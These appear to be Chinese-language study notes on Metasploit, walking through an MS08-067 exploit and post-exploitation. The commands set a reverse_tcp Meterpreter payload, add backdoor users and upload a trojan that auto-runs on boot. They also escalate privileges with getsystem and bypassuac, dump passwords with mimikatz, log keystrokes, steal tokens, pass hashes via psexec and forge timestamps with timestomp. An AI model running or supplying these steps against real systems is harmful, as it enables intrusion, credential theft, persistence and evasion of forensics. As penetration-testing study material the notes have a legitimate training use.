msf
- 云服务器输入msfconsole,进入msf
- search 查找需要模块
- use 该模块
- show options查看需要配置内容
命令行输入 connect www.baidu.com 80
连接百度的80端口
back退出,返回400
应该表示是通的
- jobs 显示和管理作业
- kill 进程
- loadpath 加载模块的路径
- load 加载插件
- route 查看会话路由信息
系统漏洞利用过程 ~ ms08067
10. 天镜,nessuss,极光扫描器进行漏扫
11. 根据漏扫结果,去msf根据漏洞编号,查找漏洞利用工具
12. use工具编号
13. info查看工具相关说明,对哪些操作系统有影响(有个列表,带编号)
14. show options
15. set rhosts xx.xxx.xxx.xx
16. set rport 一般不需要设置端口,默认了
17. 配置muma set payload windows/meterpreter/reverse_tcp
18. 设置本地监听 set lhost
19. set lport
20. set target 2(受影响操作系统的编号
21. exploit
攻击失败,可以再run一次试试
进入meterpreter>命令行,说明攻击成功,进入木马模式
shell 进入对方命令行
net user 123 123 /add 新建用户
exit 回到meterpreter>
想要对方图形化界面,需要开3389,kali不支持,需要单独传个马过去
木ma两种连接方式
22. 正向(会被防火墙拦截
23. 反向(监听(大多数人使用
攻击自己的时候,要关防火墙
windows/meterpreter/reverse_tcp_dns 穿墙比较厉害
后期攻击
upload 文件名 目标地址
上传本机文件到目标主机
-r 参数 递归
pcshare文件,是驱动级别的马
使用pcshare,生成出一个马123.exe放在mnt下,传到对方windows下的c盘
upload //mnt//123.exe c:\\123.exe
execute -f c://123.exe 强制执行
在pcshare发现对方已上线。只要对方一开机就会自动上线
使用pashare图形化界面对对方电脑进行控制《文件管理《截屏《上传《音视频录制。。。。。。
download 文件名 文件被保存的地址
meterpreter> execute -f cmd -c 在对方主机创建新的cmd通道
ps 查看进程
getsystem 提权本地系统,提到windows最高system权限
getuid 查看当前权限
meterpreter模式下
想使用msf模块内容
可用background命令,后台执行
**脚本提权**
use exploit/windows/local(放的是本地提权脚本)/bypassuac
已与对方建立连接状态下session -i查看目前只有一个session,编号1
新建会话(成功了,就是system用户的会话): 直接set session 2
## 内核漏洞提权
session -i 1 进入会话,进入meterpreter模式
提权成功后—》扩大战果–获取管理员账号密码
mimikatz抓取密码
在meterpreter模式下load mimikatz
wdigest 获取对方主机用户密码
开远程
meterpreter>run getgui -e 开启远程桌面
run getgui -u 123 -p 123 创建用户
run getgui -f 6661 -e 3389端口转发到6661
- 键盘记录
meterpreter>keyscan_start 开始 - sniffer抓包
- 抓对方电脑进出流量的包*
- use sniffer
sniffer_interfaces 查看网卡
sniffer_start 2 选择网卡,开始抓包
- 注册表操作
nc后门 - 令牌操纵
incognito 假冒令牌
(普通用户权限,可通过此方法)
use incognito
list_token -u 查看可用token,显示一堆用户名
impersonate_token '要伪造的用户名‘
rev2self 返回原始token
窃取令牌(提权)
1. 先ps
2. steal_token《pid值》 从指定进程窃取token
3. drop_steal 删除窃取的token
- PSExec哈希传递
windows密码文件在C:\WINDOWS\system32\config\sam
use exploit/windows/smb/psexec
set payload windows/meterpreter/reverse_tcp
set lhost
set lport
set rhost
set SMBUser Administrator
set SMBPass 密码hash值
exploit
- timestomp 伪造时间戳
meterpreter>timestomp -v c://123.txt 查看时间戳
timestomp c://123.txt -f c://321.txt 把321的时间戳赋值给123
辅助模块
-
whois 信息探测
msf>whois www.baidu.com -
查找邮箱
use auxiliary/gather/search_email_collector
-
dns 枚举
use auxiliary/gather/enum_dns
设置顶级域名,不加www
内置nmap
msf>nmap -sV 192.168.11.101
syn扫描
use auxiliary/scanner/portscan/syn
set rhosts
set thread
run
tcp扫描
use auxiliary/scanner/portscan/tcp
服务版本信息探测
- smb 版本 use auxiliary/scanner/smb/smb_version
- ssh 版本 use auxiliary/scanner/ssh/ssh_version
- ftp 版本